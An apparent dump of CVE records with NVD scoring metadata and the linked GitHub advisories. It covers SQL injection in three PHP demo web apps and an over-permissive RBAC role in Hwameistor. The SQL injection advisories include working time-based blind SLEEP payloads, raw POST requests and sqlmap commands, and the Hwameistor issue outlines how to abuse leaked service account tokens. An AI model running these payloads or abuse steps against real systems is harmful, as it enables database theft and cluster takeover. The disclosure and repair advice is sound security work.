[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fabianros:online_quiz_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "15DF6E37-6F4D-459A-823E-73DB8450C6CC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/t4rrega/cve/issues/7
[ "Exploit", "Third Party Advisory" ]
github.com
[ "t4rrega", "cve" ]
# code-projects Online Quiz Site Using PHP With Source Code v1.0 index.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online Quiz Site Using PHP With Source Code ## Vendor Homepage + https://code-projects.org/online-quiz-site-using-php-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + t4rrega ## Vulnerable File + index.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/67670413-e2f8-47a5-87b3-a6a9ecdf8885 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'index.php' file of the 'Online Quiz Site Using PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "loginid " and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="808" alt="1" src="https://github.com/user-attachments/assets/71641e85-cecc-4146-a63a-3eb40b7621df"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input verification for the "loginid " parameter, a serious SQL injection vulnerability has been discovered in the "Online Quiz Site Using PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login verification required # Vulnerability details and POC ``` POST /index.php HTTP/1.1 Host: 192.168.0.102:1214 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 37 Origin: http://192.168.0.102:1214 Connection: close Referer: http://192.168.0.102:1214/index.php Cookie: PHPSESSID=ng2789oib9vsb0mictkp8o643v Upgrade-Insecure-Requests: 1 Priority: u=0, i loginid=admin&pass=admin&submit=Login ``` ## Vulnerability type: + time-based blind ## Vulnerability location: + 'loginid ' parameter ## Payload: ``` Parameter: loginid (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: loginid=admin' AND (SELECT 5795 FROM (SELECT(SLEEP(5)))bZuZ) AND 'otfZ'='otfZ&pass=admin&submit=Login ``` <img width="394" alt="2" src="https://github.com/user-attachments/assets/fe9ace44-b624-4355-8152-23078b35d61f"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="398" alt="3" src="https://github.com/user-attachments/assets/8da7f0c1-0196-4f0f-913d-3a699b967f15"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
code-projects Online Quiz Site Using PHP With Source Code v1.0 index.php SQL injection
https://api.github.com/repos/t4rrega/cve/issues/7/comments
0
2024-08-26T13:48:47Z
2024-08-26T15:25:03Z
https://github.com/t4rrega/cve/issues/7
2,486,925,466
7
6,225
CVE-2024-8219
2024-08-27T22:15:05.340
A vulnerability was found in code-projects Responsive Hotel Site 1.0. It has been classified as critical. Affected is an unknown function of the file index.php. The manipulation of the argument name/phone/email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/t4rrega/cve/issues/8" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.275928" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.275928" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.398205" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fabianros:responsive_hotel_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E1C10207-0B0E-455F-B5AE-2CAA6C98BA15", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/t4rrega/cve/issues/8
[ "Exploit", "Third Party Advisory" ]
github.com
[ "t4rrega", "cve" ]
# code-projects Responsive Hotel Site Using PHP With Source Code v1.0 index.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Responsive Hotel Site Using PHP With Source Code ## Vendor Homepage + https://code-projects.org/responsive-hotel-site-using-php-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + t4rrega ## Vulnerable File + index.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/b75079c7-3ff5-4d6a-a577-d810d0b1bca7 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'index.php' file of the 'Responsive Hotel Site Using PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "name " and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="933" alt="1" src="https://github.com/user-attachments/assets/a9bbaa6d-8ccf-4063-b59e-0cedf8d6b682"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input verification for the "name " parameter, a serious SQL injection vulnerability has been discovered in the "Responsive Hotel Site Using PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login verification required # Vulnerability details and POC ``` POST /index.php HTTP/1.1 Host: 192.168.0.102:1216 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 64 Origin: http://192.168.0.102:1216 Connection: close Referer: http://192.168.0.102:1216/index.php Cookie: PHPSESSID=ng2789oib9vsb0mictkp8o643v; style=purple Upgrade-Insecure-Requests: 1 Priority: u=0, i name=123&phone=123123&email=luomoan1213%40gmail.com&sub=Send+Now ``` ## Vulnerability type: + time-based blind ## Vulnerability location: + 'name ' parameter ## Payload: ``` Parameter: name (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: name=123' AND (SELECT 3672 FROM (SELECT(SLEEP(5)))uAMt) AND 'qFZc'='qFZc&phone=123123&email=luomoan1213@gmail.com&sub=Send Now ``` <img width="320" alt="2" src="https://github.com/user-attachments/assets/85b8465c-49e7-43b0-9359-74fce7a2c1fc"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="335" alt="3" src="https://github.com/user-attachments/assets/0cf51d89-7075-42a5-8fc9-11c7af87a366"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
code-projects Responsive Hotel Site Using PHP With Source Code v1.0 index.php SQL injection
https://api.github.com/repos/t4rrega/cve/issues/8/comments
0
2024-08-26T13:52:14Z
2024-08-26T15:25:14Z
https://github.com/t4rrega/cve/issues/8
2,486,933,355
8
6,226
CVE-2024-8220
2024-08-27T22:15:05.630
A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file staffedit.php. The manipulation of the argument id/stafftype/address/fullname/phonenumber/salary leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/dd456-dd/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://itsourcecode.com/" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.275929" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.275929" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.398209" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:angeljudesuarez:tailoring_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D6D27827-5554-4FAB-8460-52599930F4FF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/dd456-dd/cve/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "dd456-dd", "cve" ]
# Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 staffedit.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Tailoring Management System Project In PHP With Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/tailoring-management-system-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + dd456 ## Vulnerable File + staffedit.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/04/tailoring-management-system-project-in-php-with-source-code.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'staffedit.php' file of the 'Tailoring Management System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "stafftype" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="972" alt="1" src="https://github.com/user-attachments/assets/005ca859-b582-4718-a12c-af51f765755f"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "stafftype" parameter, a serious SQL injection vulnerability has been discovered in the "Tailoring Management System Project in PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ``` POST /staffedit.php?id=1 HTTP/1.1 Host: 192.168.1.138:2223 Content-Length: 80 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.138:2223 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.138:2223/staffedit.php?id=1 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: __utma=123545163.603012537.1718449838.1718449838.1718449838.1; __utmz=123545163.1718449838.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=umavm58j5beqmmme0aof5v26v4 Connection: close stafftype=1&fullname=asdasw&address=2131231&phonenumber=1231231234&salary=123123 ``` ## Vulnerability type: + time-based blind ## Vulnerability location: + 'stafftype' parameter ## Payload: ``` Parameter: stafftype (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: stafftype=1' AND (SELECT 2560 FROM (SELECT(SLEEP(5)))uFyy) AND 'YsZW'='YsZW&fullname=asdasw&address=2131231&phonenumber=1231231234&salary=123123 ``` <img width="323" alt="2" src="https://github.com/user-attachments/assets/a96e52d9-a03b-49d1-947a-8206a5289f7d"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="316" alt="3" src="https://github.com/user-attachments/assets/d02adeee-df7e-496c-9a12-3bea4567c517"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 staffedit.php SQL injection
https://api.github.com/repos/dd456-dd/cve/issues/1/comments
1
2024-08-26T14:13:31Z
2024-08-26T14:13:40Z
https://github.com/dd456-dd/cve/issues/1
2,486,983,875
1
6,227
CVE-2024-45054
2024-08-28T20:15:08.547
Hwameistor is an HA local storage system for cloud-native stateful workloads. This ClusterRole has * verbs of * resources. If a malicious user can access the worker node which has hwameistor's deployment, he/she can abuse these excessive permissions to do whatever he/she likes to the whole cluster, resulting in a cluster-level privilege escalation. This issue has been patched in version 0.14.6. All users are advised to upgrade. Users unable to upgrade should update and limit the ClusterRole using security-role.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 2.8, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.1, "impactScore": 1.4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Product" ], "url": "https://github.com/hwameistor/hwameistor/blob/main/helm/hwameistor/templates/clusterrole.yaml" }, { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/hwameistor/hwameistor/commit/edf4cebed73cadd230bf97eab65c5311f2858450" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/hwameistor/hwameistor/issues/1457" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/hwameistor/hwameistor/issues/1460" }, { "source": "security-advisories@github.com", "tags": [ "Vendor Advisory" ], "url": "https://github.com/hwameistor/hwameistor/security/advisories/GHSA-mgwr-h7mv-fh29" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hwameistor:hwameistor:*:*:*:*:*:go:*:*", "matchCriteriaId": "789E23CD-2922-45F8-BD3A-AD17E16D06CA", "versionEndExcluding": "0.14.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/hwameistor/hwameistor/issues/1457
[ "Issue Tracking" ]
github.com
[ "hwameistor", "hwameistor" ]
Hi community! I just found a possible security issue when reading the code. I would like to discuss whether it is a real vulnerability. ## Description The bug is that the DaemonSet `hwameistor-local-disk-manager` in the charts has too much RBAC permission than it needs, which may cause some security problems, and the worse one leads cluster being hijacked. The problem is that the `hwameistor-local-disk-manager` uses a sharing service account ([local-disk-manager.yaml#L17](https://github.com/hwameistor/hwameistor/blob/9634728d79084a6872c3b092cb1fe1f89b7f7999/helm/hwameistor/templates/local-disk-manager.yaml#L17)) instead of creating a separate one. This causes the `hwameistor-local-disk-manager` have the following sensitive permissions: - `create/update/patch/delete` verb of `deployments/statefulsets/daemonsets/cronjobs/replicasets/job` resource (ClusterRole) - `get/list` verb of `secrets` resource (ClusterRole) - `update/patch` verb of `nodes` resource (ClusterRole) After reading the source code of [hwameistor-local-disk-manager](https://github.com/hwameistor/hwameistor), I didn't find any Kubernetes API usages using these permissions. However, these unused permissions may have some potential risks: - `create/update/patch/delete` verb of `deployments/statefulsets/daemonsets/cronjobs/replicasets/job` resource - A malicious user can create a privileged container with a malicious container image capable of container escape. This would allow him/she gaining ROOT privilege of the worker node the created container deployed. Since the malicious user can control the pod scheduling parameters (e.g., replicas number, node affinity, …), he/she should be able to deploy the malicious container to every (or almost every) worker node. This means the malicious user will be able to control every (or almost every) worker node in the cluster. - `get/list` verb of `secrets` resource - A malicious user can get/list all the secrets in the cluster (since this is declared in a ClusterRole), including database passwords, tokens of external cloud servers, etc. Even worse, if the cluster admin's token is stored in the cluster secret, he/she can use it to make a cluster-level privilege escalation. This means the malicious user will be able to hijack the whole cluster. - `update/patch` verb of `nodes` resource - This permission allows malicious users to patch all nodes in the cluster, e.g., changing their pod taints. This could help the first attack to allocate malicious containers. Also, this allows the attacker to hijack some pods with high RBAC permissions to attacker-controlled nodes. The malicious users only need to get the service account token to perform the above attacks. There are several ways have already been reported in the real world to achieve this: - Supply chain attacks: Like the xz backdoor in the recent. The attacker only needs to read `/var/run/secrets/kubernetes.io/serviceaccount/token`. - RCE vulnerability in the APP: Any remote-code-execution vulnerability that can read local files can achieve this. - Control one worker node: Since `hwameistor-local-disk-manager` is a DaemonSet, it will be deployed on every worker node in the cluster. Any attacker who controls one worker node can further control the whole cluster with these permissions. ## Mitigation Suggestion - Create a separate service account and remove all the unnecessary permissions - Specify the resource names in the role rules if it can be determined. For example, list all the secret names the APP needs to read. However, it may need a careful review of the source code to identify all the secrets needed exactly. - Write Kyverno or OPA/Gatekeeper policy to: - Limit the container image, entrypoint and commands of newly created pods. This would effectively avoid the creation of malicious containers. - Restrict the `securityContext` of newly created pods, especially enforcing the `securityContext.privileged` and `securityContext.allowPrivilegeEscalation` to `false`. This would prevent the attacker from escaping the malicious container. In old Kubernetes versions, `PodSecurityPolicy` can also be used to achive this (it is deprecated in v1.21). ## Few Questions - Are these permissions really unused for hwameistor-local-disk-manager? - Would these mitigation suggestions be applicable for the hwameistor? ## References Several CVEs had already been assigned in other projects for similar issues: - [2023-30512](https://nvd.nist.gov/vuln/detail/CVE-2023-30512) - [2023-30617](https://nvd.nist.gov/vuln/detail/CVE-2023-30617) - [2023-26484](https://nvd.nist.gov/vuln/detail/CVE-2023-26484) - [2023-30840](https://nvd.nist.gov/vuln/detail/CVE-2023-30840)
[Bug] DaemonSet hwameistor-local-disk-manager has too much RBAC permission which may leads the whole cluster being hijacked
https://api.github.com/repos/hwameistor/hwameistor/issues/1457/comments
2
2024-04-28T13:52:58Z
2024-07-29T01:36:37Z
https://github.com/hwameistor/hwameistor/issues/1457
2,267,577,538
1,457
6,228
CVE-2024-45054
2024-08-28T20:15:08.547
Hwameistor is an HA local storage system for cloud-native stateful workloads. This ClusterRole has * verbs of * resources. If a malicious user can access the worker node which has hwameistor's deployment, he/she can abuse these excessive permissions to do whatever he/she likes to the whole cluster, resulting in a cluster-level privilege escalation. This issue has been patched in version 0.14.6. All users are advised to upgrade. Users unable to upgrade should update and limit the ClusterRole using security-role.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 2.8, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.1, "impactScore": 1.4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
